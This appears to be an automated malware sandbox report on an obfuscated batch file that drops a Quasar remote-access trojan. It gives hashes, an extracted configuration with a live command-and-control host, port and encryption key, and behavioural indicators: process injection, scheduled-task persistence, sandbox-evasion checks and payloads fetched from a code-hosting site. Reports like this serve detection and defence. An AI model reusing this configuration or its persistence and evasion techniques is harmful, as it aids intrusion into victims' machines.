Analysis
-
max time kernel
31s -
max time network
35s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
12-05-2024 18:37
Static task
static1
Behavioral task
behavioral1
Sample
Fixer-obf (1).bat
Resource
win7-20240508-en
General
-
Target
Fixer-obf (1).bat
-
Size
24KB
-
MD5
03361badff8e7ecad39acd34f5f14749
-
SHA1
c023fd9bd854f59f527141824e8fa6a311a57858
-
SHA256
3026eb3fcde09d0d4e0695b3f74cb420b1e9d64b30c1ced3ed6a20f085a34d51
-
SHA512
796e7466d4af6e2d52bc265b6a9d0881989cebd52ff6c6bae8d3817db61f50dc26e5982a6eb5fe16bf4e7d5cf3aa09a5a33e35c51c94a58d32438684fb88f979
-
SSDEEP
384:UOpRAoUR7FKSVwpehr0kqTdyUO0OPniIjSFI:zpRrURhKKEehr0kqTIUO0OPnih+
Malware Config
Extracted
quasar
3.1.5
RPad
even-lemon.gl.at.ply.gg:33587
$Sxr-okPqrmZ8kNVUcS4Rp0
-
encryption_key
XmcBnPuLlN1e8SHIRR1z
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\BoostBot.exe family_quasar behavioral2/memory/2672-25-0x0000000000420000-0x000000000048C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 4028 created 616 4028 powershell.EXE winlogon.exe PID 1084 created 616 1084 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$sxr-powershell.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation $sxr-powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
BoostBot.exe$sxr-powershell.exeinstall.exeinstall.exepid process 2672 BoostBot.exe 5012 $sxr-powershell.exe 2244 install.exe 5008 install.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 27 raw.githubusercontent.com 32 raw.githubusercontent.com 26 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 20 ip-api.com -
Drops file in System32 directory 11 IoCs
Processes:
svchost.exepowershell.EXEsvchost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 4028 set thread context of 3780 4028 powershell.EXE dllhost.exe PID 1084 set thread context of 3792 1084 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
RuntimeBroker.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 RuntimeBroker.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 RuntimeBroker.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 RuntimeBroker.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 RuntimeBroker.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID RuntimeBroker.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
mousocoreworker.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
SCHTASKS.exeschtasks.exeSCHTASKS.exeschtasks.exepid process 3600 SCHTASKS.exe 3096 schtasks.exe 1504 SCHTASKS.exe 2324 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
mousocoreworker.exewmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEmousocoreworker.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018400E1E98B978" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E1E98B978" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018400E1E98B978 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000004710f940154f374ead54f219e7ad58f3000000000200000000001066000000010000200000002c18ec4c7061fd283e91c2a67082ac39971162e17d2e79f7e420ff459bb79b5c000000000e8000000002000020000000565b2379d846f385bc0c7a15cd1d0bf9f6546da598014f6d6d144053ed8915978000000015a4eefdfc461150862bdae663b15e0012a49a3edd20124af343732246228aa3d2c9b330d934056e73e330b7d468fe60d29865da323900105000bc5c298332da113cc1690c81c200107438f5209796844d9359ab4f1daa394fbdf60029431727522af0da4775fa8201c57166910e3b10717374d70ec4cda5654d01b31446e63640000000d4d52c614fe48d9f50cd3237092293968ee594460409703f4b8abe970490f501920098966379e5d8544f3347fe4f254d8dddf0b52d2f7ec5d3b6a5671154c4cd mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE -
Modifies registry class 3 IoCs
Processes:
Explorer.EXERuntimeBroker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exe$sxr-powershell.exewmiprvse.exepid process 1604 powershell.exe 1604 powershell.exe 4028 powershell.EXE 4028 powershell.EXE 1084 powershell.EXE 1084 powershell.EXE 4028 powershell.EXE 3780 dllhost.exe 3780 dllhost.exe 3780 dllhost.exe 3780 dllhost.exe 1084 powershell.EXE 1084 powershell.EXE 3792 dllhost.exe 3792 dllhost.exe 3780 dllhost.exe 3780 dllhost.exe 3780 dllhost.exe 3780 dllhost.exe 5012 $sxr-powershell.exe 3780 dllhost.exe 3780 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 976 wmiprvse.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 5012 $sxr-powershell.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 5012 $sxr-powershell.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 5012 $sxr-powershell.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3436 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeBoostBot.exe$sxr-powershell.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 1604 powershell.exe Token: SeDebugPrivilege 2672 BoostBot.exe Token: SeDebugPrivilege 5012 $sxr-powershell.exe Token: SeDebugPrivilege 4028 powershell.EXE Token: SeDebugPrivilege 1084 powershell.EXE Token: SeDebugPrivilege 4028 powershell.EXE Token: SeDebugPrivilege 3780 dllhost.exe Token: SeDebugPrivilege 1084 powershell.EXE Token: SeDebugPrivilege 3792 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2416 svchost.exe Token: SeIncreaseQuotaPrivilege 2416 svchost.exe Token: SeSecurityPrivilege 2416 svchost.exe Token: SeTakeOwnershipPrivilege 2416 svchost.exe Token: SeLoadDriverPrivilege 2416 svchost.exe Token: SeSystemtimePrivilege 2416 svchost.exe Token: SeBackupPrivilege 2416 svchost.exe Token: SeRestorePrivilege 2416 svchost.exe Token: SeShutdownPrivilege 2416 svchost.exe Token: SeSystemEnvironmentPrivilege 2416 svchost.exe Token: SeUndockPrivilege 2416 svchost.exe Token: SeManageVolumePrivilege 2416 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2416 svchost.exe Token: SeIncreaseQuotaPrivilege 2416 svchost.exe Token: SeSecurityPrivilege 2416 svchost.exe Token: SeTakeOwnershipPrivilege 2416 svchost.exe Token: SeLoadDriverPrivilege 2416 svchost.exe Token: SeSystemtimePrivilege 2416 svchost.exe Token: SeBackupPrivilege 2416 svchost.exe Token: SeRestorePrivilege 2416 svchost.exe Token: SeShutdownPrivilege 2416 svchost.exe Token: SeSystemEnvironmentPrivilege 2416 svchost.exe Token: SeUndockPrivilege 2416 svchost.exe Token: SeManageVolumePrivilege 2416 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2416 svchost.exe Token: SeIncreaseQuotaPrivilege 2416 svchost.exe Token: SeSecurityPrivilege 2416 svchost.exe Token: SeTakeOwnershipPrivilege 2416 svchost.exe Token: SeLoadDriverPrivilege 2416 svchost.exe Token: SeSystemtimePrivilege 2416 svchost.exe Token: SeBackupPrivilege 2416 svchost.exe Token: SeRestorePrivilege 2416 svchost.exe Token: SeShutdownPrivilege 2416 svchost.exe Token: SeSystemEnvironmentPrivilege 2416 svchost.exe Token: SeUndockPrivilege 2416 svchost.exe Token: SeManageVolumePrivilege 2416 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2416 svchost.exe Token: SeIncreaseQuotaPrivilege 2416 svchost.exe Token: SeSecurityPrivilege 2416 svchost.exe Token: SeTakeOwnershipPrivilege 2416 svchost.exe Token: SeLoadDriverPrivilege 2416 svchost.exe Token: SeSystemtimePrivilege 2416 svchost.exe Token: SeBackupPrivilege 2416 svchost.exe Token: SeRestorePrivilege 2416 svchost.exe Token: SeShutdownPrivilege 2416 svchost.exe Token: SeSystemEnvironmentPrivilege 2416 svchost.exe Token: SeUndockPrivilege 2416 svchost.exe Token: SeManageVolumePrivilege 2416 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2416 svchost.exe Token: SeIncreaseQuotaPrivilege 2416 svchost.exe Token: SeSecurityPrivilege 2416 svchost.exe Token: SeTakeOwnershipPrivilege 2416 svchost.exe Token: SeLoadDriverPrivilege 2416 svchost.exe Token: SeSystemtimePrivilege 2416 svchost.exe Token: SeBackupPrivilege 2416 svchost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Explorer.EXEpid process 3436 Explorer.EXE -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
Explorer.EXEpid process 3436 Explorer.EXE 3436 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid process 5012 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeBoostBot.exe$sxr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 5116 wrote to memory of 1784 5116 cmd.exe chcp.com PID 5116 wrote to memory of 1784 5116 cmd.exe chcp.com PID 5116 wrote to memory of 1516 5116 cmd.exe findstr.exe PID 5116 wrote to memory of 1516 5116 cmd.exe findstr.exe PID 5116 wrote to memory of 3184 5116 cmd.exe findstr.exe PID 5116 wrote to memory of 3184 5116 cmd.exe findstr.exe PID 5116 wrote to memory of 4528 5116 cmd.exe findstr.exe PID 5116 wrote to memory of 4528 5116 cmd.exe findstr.exe PID 5116 wrote to memory of 1084 5116 cmd.exe findstr.exe PID 5116 wrote to memory of 1084 5116 cmd.exe findstr.exe PID 5116 wrote to memory of 4788 5116 cmd.exe cmd.exe PID 5116 wrote to memory of 4788 5116 cmd.exe cmd.exe PID 5116 wrote to memory of 3544 5116 cmd.exe find.exe PID 5116 wrote to memory of 3544 5116 cmd.exe find.exe PID 5116 wrote to memory of 2264 5116 cmd.exe find.exe PID 5116 wrote to memory of 2264 5116 cmd.exe find.exe PID 5116 wrote to memory of 3528 5116 cmd.exe cmd.exe PID 5116 wrote to memory of 3528 5116 cmd.exe cmd.exe PID 5116 wrote to memory of 4508 5116 cmd.exe certutil.exe PID 5116 wrote to memory of 4508 5116 cmd.exe certutil.exe PID 5116 wrote to memory of 1604 5116 cmd.exe powershell.exe PID 5116 wrote to memory of 1604 5116 cmd.exe powershell.exe PID 1604 wrote to memory of 2672 1604 powershell.exe BoostBot.exe PID 1604 wrote to memory of 2672 1604 powershell.exe BoostBot.exe PID 1604 wrote to memory of 2672 1604 powershell.exe BoostBot.exe PID 5116 wrote to memory of 3664 5116 cmd.exe icacls.exe PID 5116 wrote to memory of 3664 5116 cmd.exe icacls.exe PID 5116 wrote to memory of 3656 5116 cmd.exe reg.exe PID 5116 wrote to memory of 3656 5116 cmd.exe reg.exe PID 5116 wrote to memory of 3980 5116 cmd.exe attrib.exe PID 5116 wrote to memory of 3980 5116 cmd.exe attrib.exe PID 2672 wrote to memory of 2324 2672 BoostBot.exe schtasks.exe PID 2672 wrote to memory of 2324 2672 BoostBot.exe schtasks.exe PID 2672 wrote to memory of 2324 2672 BoostBot.exe schtasks.exe PID 2672 wrote to memory of 5012 2672 BoostBot.exe $sxr-powershell.exe PID 2672 wrote to memory of 5012 2672 BoostBot.exe $sxr-powershell.exe PID 2672 wrote to memory of 5012 2672 BoostBot.exe $sxr-powershell.exe PID 2672 wrote to memory of 2244 2672 BoostBot.exe install.exe PID 2672 wrote to memory of 2244 2672 BoostBot.exe install.exe PID 2672 wrote to memory of 2244 2672 BoostBot.exe install.exe PID 2672 wrote to memory of 3600 2672 BoostBot.exe SCHTASKS.exe PID 2672 wrote to memory of 3600 2672 BoostBot.exe SCHTASKS.exe PID 2672 wrote to memory of 3600 2672 BoostBot.exe SCHTASKS.exe PID 5012 wrote to memory of 3096 5012 $sxr-powershell.exe schtasks.exe PID 5012 wrote to memory of 3096 5012 $sxr-powershell.exe schtasks.exe PID 5012 wrote to memory of 3096 5012 $sxr-powershell.exe schtasks.exe PID 5012 wrote to memory of 5008 5012 $sxr-powershell.exe install.exe PID 5012 wrote to memory of 5008 5012 $sxr-powershell.exe install.exe PID 5012 wrote to memory of 5008 5012 $sxr-powershell.exe install.exe PID 4028 wrote to memory of 3780 4028 powershell.EXE dllhost.exe PID 4028 wrote to memory of 3780 4028 powershell.EXE dllhost.exe PID 4028 wrote to memory of 3780 4028 powershell.EXE dllhost.exe PID 4028 wrote to memory of 3780 4028 powershell.EXE dllhost.exe PID 4028 wrote to memory of 3780 4028 powershell.EXE dllhost.exe PID 4028 wrote to memory of 3780 4028 powershell.EXE dllhost.exe PID 4028 wrote to memory of 3780 4028 powershell.EXE dllhost.exe PID 4028 wrote to memory of 3780 4028 powershell.EXE dllhost.exe PID 3780 wrote to memory of 616 3780 dllhost.exe winlogon.exe PID 3780 wrote to memory of 672 3780 dllhost.exe lsass.exe PID 3780 wrote to memory of 952 3780 dllhost.exe svchost.exe PID 3780 wrote to memory of 332 3780 dllhost.exe dwm.exe PID 3780 wrote to memory of 516 3780 dllhost.exe svchost.exe PID 3780 wrote to memory of 728 3780 dllhost.exe svchost.exe PID 3780 wrote to memory of 1072 3780 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:332
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ba24417b-58f7-4531-aa72-036281d963a6}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{728e861a-1361-42cd-aed6-a76c568eb0d0}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3792 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{56368cca-9eea-4bfa-a978-42e8b58c5cd2}2⤵PID:2816
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:516
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1104 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3016
-
